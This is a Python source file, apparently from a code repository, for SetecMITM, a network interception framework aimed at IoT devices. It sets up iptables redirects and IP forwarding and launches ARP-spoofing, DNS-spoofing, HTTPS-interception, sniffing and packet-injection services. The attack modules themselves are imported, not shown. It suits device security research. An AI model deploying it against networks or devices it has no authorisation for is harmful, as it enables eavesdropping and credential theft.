Files
setec-mitm/mitm.py
sssnake 20e7eb343d Initial commit — SetecMITM generic IoT MITM framework
Templated from cam-mitm. The camera-specific code (UBox cloud client,
CVE verifiers, OAM HMAC signing, fuzzer wordlists) is removed; what's
left is the generic core: ARP spoof, DNS spoof, HTTP/HTTPS interception
with peek-before-wrap, raw sniffer with conntrack-based original-dst
lookup, protocol fingerprinting, intruder detection, packet injection,
log rotation, PyQt6 GUI on top of a service Controller.

All 'camera' references renamed to 'target' throughout. Configuration
moved into ~/.config/setec-mitm/config.json with the Settings tab as
the primary editor. Plugin system at targets/<name>/plugin.py for
vendor-specific code.

See README.md for full setup, plugin authoring, and troubleshooting.

Co-authored by Setec Labs.
2026-04-09 08:38:59 -07:00

224 lines
8.1 KiB
Python
Executable File

#!/usr/bin/env python3
"""
SetecMITM — generic IoT / cloud-device MITM framework.

Drop-in framework for ARP spoofing, DNS hijacking, HTTP/HTTPS interception,
UDP capture, raw sniffer, intruder detection, and packet injection against
any device on the LAN. Target-specific logic (vendor cloud clients, CVE
verifiers, fuzzer wordlists) lives in `targets/<name>/` plugins.

Run with:
    sudo /usr/bin/python3 mitm.py
or via the PyQt6 GUI:
    sudo /usr/bin/python3 gui.py
"""
import os
import sys
import signal
import threading
import time
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
from config import Config
from utils.log import (
log, log_lines, init_logfile, close_logfile, lock,
C_NONE, C_ERROR, C_SUCCESS, C_INFO, C_TRAFFIC, C_IMPORTANT,
)
from services import (
arp_spoof, dns_spoof, http_server, udp_listener, sniffer, intruder_watch,
)
from inject import packet
# Registry of supervised services, in start-up order. Every entry is a
# (name, runner_factory) pair; the factory is invoked as
# factory(cfg, flags, ck), where `ck` is a zero-argument callable that the
# supervisor uses to tell the service whether it should keep running.
# The lambdas defer the `<module>.run` attribute lookup until call time.
SERVICE_DEFS = [
    ("arp", lambda cfg, flags, ck: arp_spoof.run(cfg, flags, ck)),
    ("dns", lambda cfg, flags, ck: dns_spoof.run(cfg, flags, ck)),
    ("http", lambda cfg, flags, ck: http_server.run_http(cfg, flags, ck)),
    ("https", lambda cfg, flags, ck: http_server.run_https(cfg, flags, ck)),
    ("sniffer", lambda cfg, flags, ck: sniffer.run(cfg, flags, ck)),
    ("intruder", lambda cfg, flags, ck: intruder_watch.run(cfg, flags, ck)),
]

# Service names only, in registry order.
SERVICE_NAMES = [svc_name for svc_name, _factory in SERVICE_DEFS]

# Lookup from service name to its full (name, runner_factory) registry entry.
SERVICE_BY_NAME = dict(zip(SERVICE_NAMES, SERVICE_DEFS))
class Controller:
    """
    Service supervisor. Owns the iptables redirect rules, per-service
    on/off state, and the loaded target plugin (if any).

    Attributes:
        cfg: the Config instance handed to every service runner.
        flags: dict shared with every service runner; the supervisor itself
            only writes ``flags[name] = False`` when a service is stopped
            and clears the dict when everything is stopped.
        running: global run flag; once False, every service's keep-running
            callback returns False.
        services_running: True while at least one named service is marked
            as running.
        plugin: instance of the configured target plugin, or None.
    """

    # Listening socket (fuser notation) that must be freed for a service.
    # Services that are not listed here do not bind a well-known port.
    _SERVICE_PORTS = {"http": "80/tcp", "https": "443/tcp", "dns": "53/udp"}

    def __init__(self):
        self.cfg = Config()
        self.flags = {}
        self.running = True
        self.services_running = False
        self._svc_running = {n: False for n in SERVICE_NAMES}
        self._iptables_up = False
        # (command prefix, rule spec) pairs that _setup_iptables installed,
        # kept so that cleanup removes exactly those rules.
        self._iptables_rules = []
        self.plugin = None
        self._load_plugin()

    # ─── plugin loader ────────────────────────────────────
    def _load_plugin(self):
        """Import ``targets.<target_plugin>.plugin`` and instantiate its Plugin.

        Does nothing when no ``target_plugin`` is configured. Any failure is
        logged and leaves ``self.plugin`` as None, so a broken plugin never
        prevents the core framework from starting.
        """
        name = self.cfg.get("target_plugin", "")
        if not name:
            return
        try:
            mod = __import__(f"targets.{name}.plugin", fromlist=["Plugin"])
            self.plugin = mod.Plugin(self.cfg)
            log(f"plugin loaded: {name}", C_SUCCESS)
        except Exception as e:
            # Deliberately broad: plugin code is third-party and optional.
            log(f"plugin load failed ({name}): {e}", C_ERROR)

    # ─── iptables ─────────────────────────────────────────
    def _ensure_iptables(self):
        """Install the redirect rules once; a no-op while they are in place.

        Requires ``target_ip`` and ``our_ip`` to be configured. When they are
        missing an error is logged and nothing is installed (callers carry
        on regardless).
        """
        if self._iptables_up:
            return
        if not self.cfg["target_ip"] or not self.cfg["our_ip"]:
            log("iptables: target_ip and our_ip must be set", C_ERROR)
            return
        # Kill any external arpspoof process before taking over.
        os.system("pkill -f arpspoof 2>/dev/null")
        os.makedirs(self.cfg["log_dir"], exist_ok=True)
        self._setup_iptables()
        self._iptables_up = True

    def _iptables_rule_parts(self):
        """Return the redirect rules for the current config.

        Each rule is a ``(command_prefix, rule_spec)`` pair; the operation
        flag (``-A`` to add, ``-D`` to delete) is inserted between the two.

        NOTE(review): the IPs are interpolated into a shell command that
        runs as root, so the config values must be trusted.
        """
        tgt = self.cfg["target_ip"]
        us = self.cfg["our_ip"]
        rules = [("iptables", "OUTPUT -p icmp --icmp-type redirect -j DROP")]
        # DNAT the target's DNS, HTTP and HTTPS traffic to this host.
        for proto, port in (("udp", 53), ("tcp", 80), ("tcp", 443)):
            rules.append((
                "iptables -t nat",
                f"PREROUTING -s {tgt} -p {proto} --dport {port} "
                f"-j DNAT --to-destination {us}:{port}",
            ))
        return rules

    def _setup_iptables(self):
        """Enable IP forwarding and append the redirect rules."""
        rules = self._iptables_rule_parts()
        os.system("sysctl -w net.ipv4.ip_forward=1 >/dev/null 2>&1")
        for prefix, spec in rules:
            os.system(f"{prefix} -A {spec} >/dev/null 2>&1")
        # Remember what was installed: the config may be edited before
        # cleanup, and deletes must match the added rules exactly.
        self._iptables_rules = rules
        log("iptables rules applied", C_INFO)

    def _cleanup_iptables(self):
        """Delete the redirect rules added by ``_setup_iptables``.

        Uses the recorded rules when available and falls back to rules
        derived from the current config otherwise. IP forwarding is left
        enabled.
        """
        rules = getattr(self, "_iptables_rules", None) or self._iptables_rule_parts()
        for prefix, spec in rules:
            os.system(f"{prefix} -D {spec} >/dev/null 2>&1")
        self._iptables_rules = []

    # ─── per-service control ──────────────────────────────
    def _free_port(self, name):
        """Kill whatever process holds the port used by service *name*, if any."""
        port = self._SERVICE_PORTS.get(name)
        if port:
            os.system(f"fuser -k {port} 2>/dev/null")

    def start_service(self, name):
        """Start the named service in a daemon thread.

        Logs an error and returns if *name* is unknown or already running.
        The service runner receives ``cfg``, ``flags`` and a callback that
        stays truthy while both the controller and this service are meant
        to run.
        """
        if name not in SERVICE_BY_NAME:
            log(f"unknown service: {name}", C_ERROR)
            return
        if self._svc_running.get(name):
            log(f"{name} already running", C_ERROR)
            return
        self._ensure_iptables()
        self._free_port(name)
        time.sleep(0.2)  # give the kernel a moment to release the port
        self._svc_running[name] = True
        check = lambda n=name: self.running and self._svc_running.get(n, False)
        runner = SERVICE_BY_NAME[name][1]
        threading.Thread(
            target=lambda: runner(self.cfg, self.flags, check),
            daemon=True, name=f"svc-{name}",
        ).start()
        self.services_running = any(self._svc_running.values())
        log(f"started: {name}", C_SUCCESS)

    def stop_service(self, name):
        """Ask the named service to stop and free its port.

        Logs an error and returns if the service is not marked as running.
        The service thread is not joined; it is expected to notice that its
        keep-running callback turned False.
        """
        if not self._svc_running.get(name):
            log(f"{name} not running", C_ERROR)
            return
        self._svc_running[name] = False
        log(f"stopping: {name}", C_INFO)
        # Killing the socket holder unblocks a runner stuck in accept/recv.
        self._free_port(name)
        time.sleep(0.5)
        self.flags[name] = False
        self.services_running = any(self._svc_running.values())

    def toggle_service(self, name):
        """Stop the named service if it is running, otherwise start it."""
        if self._svc_running.get(name):
            self.stop_service(name)
        else:
            self.start_service(name)

    def start_services(self):
        """Start every service whose ``auto_<name>`` config flag is truthy.

        A missing flag counts as enabled. Afterwards one UDP listener thread
        is started per port in ``auto_udp_ports``. Refuses to run while any
        service is already running.
        """
        if self.services_running:
            log("services already running", C_ERROR)
            return
        self._ensure_iptables()
        # Honour auto_* config flags
        for name in SERVICE_NAMES:
            key = f"auto_{name}"
            if self.cfg.get(key, True):
                self.start_service(name)
                time.sleep(0.3)
        # Optional UDP listeners.
        # NOTE(review): their keep-running callback reads services_running,
        # so they only stay alive while at least one named service runs.
        for port in self.cfg.get("auto_udp_ports", []) or []:
            threading.Thread(
                target=lambda p=port: udp_listener.run(
                    p, self.cfg, self.flags,
                    lambda: self.running and self.services_running),
                daemon=True, name=f"svc-udp{port}",
            ).start()
            time.sleep(0.2)
        log("all services started", C_SUCCESS)

    def stop_services(self):
        """Stop every running service and remove the iptables rules.

        Also runs when no service is currently marked as running but the
        redirect rules are still installed (services that were started and
        then stopped one by one), so the rules are not left behind.
        """
        if not self.services_running and not self._iptables_up:
            log("services not running", C_ERROR)
            return
        log("stopping all services…", C_INFO)
        for name in SERVICE_NAMES:
            if self._svc_running.get(name):
                self.stop_service(name)
        time.sleep(1)  # let service threads wind down before removing rules
        self._cleanup_iptables()
        self._iptables_up = False
        self.flags.clear()
        self.services_running = False
        log("services stopped", C_INFO)

    def inject_packet(self, params):
        """Forward *params* to ``inject.packet.inject`` and return its result."""
        return packet.inject(self.cfg, params)
def main():
    """Headless entry point: start all services and wait for a signal.

    Exits with status 1 when not run as root. SIGINT and SIGTERM stop the
    services, remove the iptables rules, close the log file and exit with
    status 0.
    """
    if os.geteuid() != 0:
        print("Run with: sudo /usr/bin/python3 mitm.py")
        sys.exit(1)
    ctrl = Controller()
    log_dir = ctrl.cfg["log_dir"]
    if log_dir:
        # The controller only creates this directory later, while setting
        # up iptables; make sure it exists before the log file is opened.
        os.makedirs(log_dir, exist_ok=True)
    init_logfile(f"{log_dir}/setec_mitm.log")

    def shutdown(*_):
        log("shutting down…", C_INFO)
        ctrl.stop_services()
        ctrl.running = False
        close_logfile()
        sys.exit(0)

    # Register the handlers BEFORE starting services: start-up takes several
    # seconds and installs iptables rules, so a signal arriving in that
    # window must still go through the clean-up path.
    signal.signal(signal.SIGINT, shutdown)
    signal.signal(signal.SIGTERM, shutdown)

    # Headless mode — start everything and wait. The full curses TUI from
    # cam-mitm is not bundled here; use gui.py instead.
    log("setec-mitm headless mode. Use gui.py for the full UI.", C_INFO)
    ctrl.start_services()
    while ctrl.running:
        time.sleep(0.5)
# Run the headless supervisor only when executed as a script, not on import
# (gui.py imports this module for its Controller).
if __name__ == "__main__":
    main()